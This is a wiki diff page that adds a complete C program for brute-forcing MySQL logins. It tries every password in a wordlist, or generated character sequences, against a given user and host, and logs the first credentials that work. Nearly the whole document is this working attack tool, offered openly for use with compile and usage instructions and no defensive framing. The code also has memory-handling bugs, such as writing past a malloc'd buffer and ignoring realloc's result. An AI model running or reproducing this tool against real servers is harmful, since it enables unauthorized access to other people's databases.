This shows you the differences between two versions of the page.
— |
c:examples:mysql_bruteforce [2024/02/16 01:05] (current) |
||
---|---|---|---|
Line 1: | Line 1: | ||
+ | ===== MySQL Bruteforce ===== | ||
+ | written while a boring day\\ | ||
+ | more information on http://code-reference.com | ||
+ | |||
+ | <file c mysql_bruteforce.c> | ||
+ | #include <stdio.h> | ||
+ | #include <mysql/mysql.h> | ||
+ | #include <curses.h> | ||
+ | #include <string.h> | ||
+ | #include <stdlib.h> | ||
+ | |||
+ | // Deutsch oder English | ||
+ | #define GER 1 | ||
+ | #define ENG 0 | ||
+ | /* | ||
+ | ************************************************************************************************** | ||
+ | * MYSQL Bruteforce Programm aus purer lange Weile geschrieben | ||
+ | * 23.03 2010 by cd | ||
+ | * | ||
+ | * gcc mysql-bruteforce.c -o mysql-bruteforce -lmysqlclient -lncurses -O2 -Wall | ||
+ | * oder -O6 anstatt -O2 | ||
+ | * ./mysql-bruteforce benutzer computer kennwortliste <optional länge des kennworts> | ||
+ | * log Datei ist "mysql-bruteforce.log" | ||
+ | * | ||
+ | ************************************************************************************************** | ||
+ | ************************************************************************************************** | ||
+ | * | ||
+ | * for the people that understand no german change the #define ENG to 1 and GER to 0 | ||
+ | * | ||
+ | * compile with: gcc mysql-bruteforce.c -o mysql-bruteforce -lmysqlclient -lncurses -O3 -Wall | ||
+ | * or -O6 instead of -O2 | ||
+ | * usage: ./mysql-bruteforce user host <password list> <optional len of password> | ||
+ | * log file is "mysql-bruteforce.log" | ||
+ | * | ||
+ | ************************************************************************************************** | ||
+ | * | ||
+ | * Newest version http://code-reference.com | ||
+ | * | ||
+ | * Think about the old good time MoD | ||
+ | * If you want to survive out here, you've got to know where your towel is. | ||
+ | */ | ||
+ | |||
+ | MYSQL *my; | ||
+ | |||
+ | int count=0; | ||
+ | char *passwd; | ||
+ | |||
+ | #define STARTCHR 46 // 33 set start ascii char | ||
+ | #define ENDCHR 122 // 127 set end ascii cahr | ||
+ | #define BUFF_SIZE 1024 | ||
+ | #define LEN 80 | ||
+ | |||
+ | char buffer[BUFF_SIZE]; | ||
+ | int jump=0; | ||
+ | |||
+ | int main (int argc, char *argv[]) | ||
+ | { | ||
+ | if (argc <= 3 ) | ||
+ | { | ||
+ | #if ENG && !GER | ||
+ | printf("\n" | ||
+ | "\n MySQL Bruteforce, written by cd\n\n" | ||
+ | " via wordlist\n" | ||
+ | " %s root localhost wordlist # use complete wordlist\n" | ||
+ | " %s root 127.0.0.1 ../wordlist 7 # serch only words with 7 chars\n" | ||
+ | "\n" | ||
+ | " standard bruteforce\n" | ||
+ | " %s root localhost -b # Bruteforce Method (standard up to 8 chars)\n" | ||
+ | " %s root 127.0.0.1 -b 12 # up to 12 chars\n" | ||
+ | " %s root host -b 12 Test # start with the given Word\n\n\n\n\n",argv[0],argv[0],argv[0],argv[0],argv[0]); | ||
+ | #else | ||
+ | printf("\n" | ||
+ | "\n MySQL Bruteforce, geschrieben von cd\n\n" | ||
+ | " via Wörterliste\n" | ||
+ | " %s root localhost wordlist # Gesamte Wörterliste durchsuchen\n" | ||
+ | " %s root 127.0.0.1 ../wordlist 7 # suche nur Wörter mit 7 Buchstaben\n" | ||
+ | "\n" | ||
+ | " Standard Bruteforce\n" | ||
+ | " %s root localhost -b # Bruteforce Methode (standard bis zu 8 Buchstaben)\n" | ||
+ | " %s root 127.0.0.1 -b 12 # bis zu 12 Buchstaben\n" | ||
+ | " %s root host -b 12 Test # Startet mit angegebenen Wort\n\n\n\n\n",argv[0],argv[0],argv[0],argv[0],argv[0]); | ||
+ | #endif | ||
+ | return 0; | ||
+ | } | ||
+ | |||
+ | if(strcmp(argv[3],"-b")) | ||
+ | { | ||
+ | jump=0; | ||
+ | } else jump=1; | ||
+ | |||
+ | initscr(); | ||
+ | printw("\n#################################\n#\tMYSQL Bruteforce\t#\n#\t2010 by cd\t\t#\n#################################\n\n\t\n"); | ||
+ | refresh(); | ||
+ | |||
+ | char host[20]; | ||
+ | char user[20]; | ||
+ | my = mysql_init(NULL); | ||
+ | FILE *pass_list,*logfile; | ||
+ | |||
+ | if( ( pass_list=fopen(argv[3],"r") ) == NULL && jump!=1 ) | ||
+ | { | ||
+ | #if ENG && !GER | ||
+ | fprintf(stderr,"Cannot open File \"%s\"\n", argv[3]); | ||
+ | #else | ||
+ | fprintf(stderr,"Kann Datei \"%s\" nicht oeffnen.\n", argv[3]); | ||
+ | #endif | ||
+ | endwin(); | ||
+ | return 0; | ||
+ | } | ||
+ | |||
+ | if( ( logfile=fopen("mysql-bruteforce.log","a+") ) == NULL ) | ||
+ | { | ||
+ | #if ENG && !GER | ||
+ | fprintf(stderr,"Cannot open File \"%s\"\n", argv[3]); | ||
+ | #else | ||
+ | fprintf(stderr,"Kann Datei \"%s\" nicht oeffnen.\n", argv[3]); | ||
+ | #endif | ||
+ | endwin(); | ||
+ | return 0; | ||
+ | } | ||
+ | |||
+ | if(my == NULL) | ||
+ | { | ||
+ | #if ENG && !GER | ||
+ | fprintf(stderr, "Initialization failed\n"); | ||
+ | #else | ||
+ | fprintf(stderr, "Initialisierung fehlgeschlagen\n"); | ||
+ | #endif | ||
+ | endwin(); | ||
+ | return 0; | ||
+ | } | ||
+ | |||
+ | sprintf(user, "%s", argv[1]); | ||
+ | sprintf(host, "%s", argv[2]); | ||
+ | |||
+ | char eingabe; | ||
+ | |||
+ | #if ENG && !GER | ||
+ | mvprintw(5,2,"User: %s Host: %s ",user,host); | ||
+ | #else | ||
+ | mvprintw(5,2,"Benutzer: %s Server: %s ",user,host); | ||
+ | #endif | ||
+ | |||
+ | if (jump==1) | ||
+ | { | ||
+ | refresh(); | ||
+ | eingabe='b'; | ||
+ | |||
+ | } | ||
+ | else {eingabe='w';} | ||
+ | |||
+ | switch(eingabe) | ||
+ | { | ||
+ | case 'b': | ||
+ | while(1) | ||
+ | { | ||
+ | int min=1,max; | ||
+ | if (argc<=4) | ||
+ | { | ||
+ | max=8; | ||
+ | } | ||
+ | else | ||
+ | { | ||
+ | max=atoi(argv[4]); | ||
+ | } | ||
+ | |||
+ | char *pass=(char*)malloc(min); | ||
+ | int pos,x,found; | ||
+ | |||
+ | pass[min]='\0'; | ||
+ | |||
+ | |||
+ | if (argc>=6) | ||
+ | { | ||
+ | min=strlen(argv[5]); | ||
+ | pass=argv[5]; | ||
+ | pass[min+1]='\0'; | ||
+ | pos=min; | ||
+ | if (atoi(argv[4])!=strlen(argv[5])) | ||
+ | { | ||
+ | #if ENG && !GER | ||
+ | mvprintw(7,0,"len of word must be the same the digit after -b\n" | ||
+ | "like: %s root localhost -b 4 abcd\n",argv[0]); | ||
+ | #else | ||
+ | mvprintw(7,0,"länge des Wortes muss die gleiche seien wie die zahl nach -b\n" | ||
+ | "z.B: %s root localhost -b 4 abcd\n",argv[0]); | ||
+ | #endif | ||
+ | refresh(); | ||
+ | endwin(); | ||
+ | return 0; | ||
+ | } | ||
+ | |||
+ | } | ||
+ | |||
+ | for(x=min;x<=max;x++) | ||
+ | { | ||
+ | if(x>min) | ||
+ | { | ||
+ | if (realloc(pass, x)) | ||
+ | { | ||
+ | memset(pass, STARTCHR, x); | ||
+ | pass[x]='\0'; | ||
+ | } else { | ||
+ | mvprintw(13,1,"error in realloc"); | ||
+ | endwin(); | ||
+ | return 1; | ||
+ | } | ||
+ | } | ||
+ | while(pass[0]<ENDCHR) | ||
+ | { | ||
+ | found=0; | ||
+ | if( mysql_real_connect (my,host,user,pass,NULL,0,NULL,0) == NULL) | ||
+ | { | ||
+ | move(6,2); | ||
+ | deleteln(); | ||
+ | mvprintw(6,2,"Pass: %s",pass); | ||
+ | refresh(); | ||
+ | } | ||
+ | else | ||
+ | { | ||
+ | move(6,2); | ||
+ | deleteln(); | ||
+ | mvprintw(6,2,"Pass: %s",pass); | ||
+ | refresh(); | ||
+ | #if ENG && !GER | ||
+ | mvprintw(8,2,"Login Success:\t %s:%s@%s\n",user,pass,host); | ||
+ | #else | ||
+ | mvprintw(8,2,"Login Erfolgreich:\t %s:%s@%s\n",user,pass,host); | ||
+ | #endif | ||
+ | refresh(); | ||
+ | endwin(); | ||
+ | mysql_close(my); | ||
+ | fprintf(logfile,"%s:%s@%s\r\n",user,pass,host); | ||
+ | return 0; | ||
+ | } | ||
+ | |||
+ | for(pos=x-1;pos!=0;pos--) | ||
+ | { | ||
+ | if(pass[pos]==ENDCHR) | ||
+ | { | ||
+ | memset(pass+pos, STARTCHR, strlen(pass)-pos); | ||
+ | pass[pos-1]++; | ||
+ | found=1; | ||
+ | break; | ||
+ | } | ||
+ | } | ||
+ | |||
+ | if(!found) | ||
+ | pass[x-1]++; | ||
+ | count++; | ||
+ | } | ||
+ | } | ||
+ | |||
+ | move(6,2); | ||
+ | deleteln(); | ||
+ | #if ENG && !GER | ||
+ | mvprintw(8,2,"Password not found for %s@%s :/",user,host); | ||
+ | #else | ||
+ | mvprintw(8,2,"Passwort fuer %s@%s nicht gefunden :/",user,host); | ||
+ | #endif | ||
+ | refresh(); | ||
+ | endwin(); | ||
+ | mysql_close (my); | ||
+ | return 0; | ||
+ | } | ||
+ | break; | ||
+ | } | ||
+ | |||
+ | int dummy; | ||
+ | while((fscanf(pass_list, "%s\r\n", buffer))!=EOF) | ||
+ | { | ||
+ | if (argv[4]) | ||
+ | { | ||
+ | if (strlen(buffer)!=atoi(argv[4])) goto next; // blubb goto i know ^^ phuu | ||
+ | } | ||
+ | |||
+ | if( mysql_real_connect (my,host,user,buffer,NULL,0,NULL,0) == NULL) | ||
+ | { | ||
+ | move(6,2); | ||
+ | deleteln(); | ||
+ | mvprintw(6,2,"Pass: %s",buffer); | ||
+ | refresh(); | ||
+ | } | ||
+ | else | ||
+ | { | ||
+ | move(6,2); | ||
+ | deleteln(); | ||
+ | mvprintw(6,2,"Pass: %s",buffer); | ||
+ | refresh(); | ||
+ | #if ENG && !GER | ||
+ | mvprintw(8,2,"Login Success:\t %s:%s@%s\n",user,buffer,host); | ||
+ | #else | ||
+ | mvprintw(8,2,"Login Erfolgreich:\t %s:%s@%s\n",user,buffer,host); | ||
+ | #endif | ||
+ | refresh(); | ||
+ | endwin(); | ||
+ | mysql_close(my); | ||
+ | fprintf(logfile,"%s:%s@%s\r\n",user,buffer,host); | ||
+ | return 0; | ||
+ | } | ||
+ | next: | ||
+ | dummy=1; | ||
+ | } | ||
+ | |||
+ | move(6,2); | ||
+ | deleteln(); | ||
+ | #if ENG && !GER | ||
+ | mvprintw(8,2,"Password not found for %s@%s :/",user,host); | ||
+ | #else | ||
+ | mvprintw(8,2,"Passwort fuer %s@%s nicht gefunden :/",user,host); | ||
+ | #endif | ||
+ | refresh(); | ||
+ | endwin(); | ||
+ | mysql_close (my); | ||
+ | return 0; | ||
+ | } | ||
+ | </file> |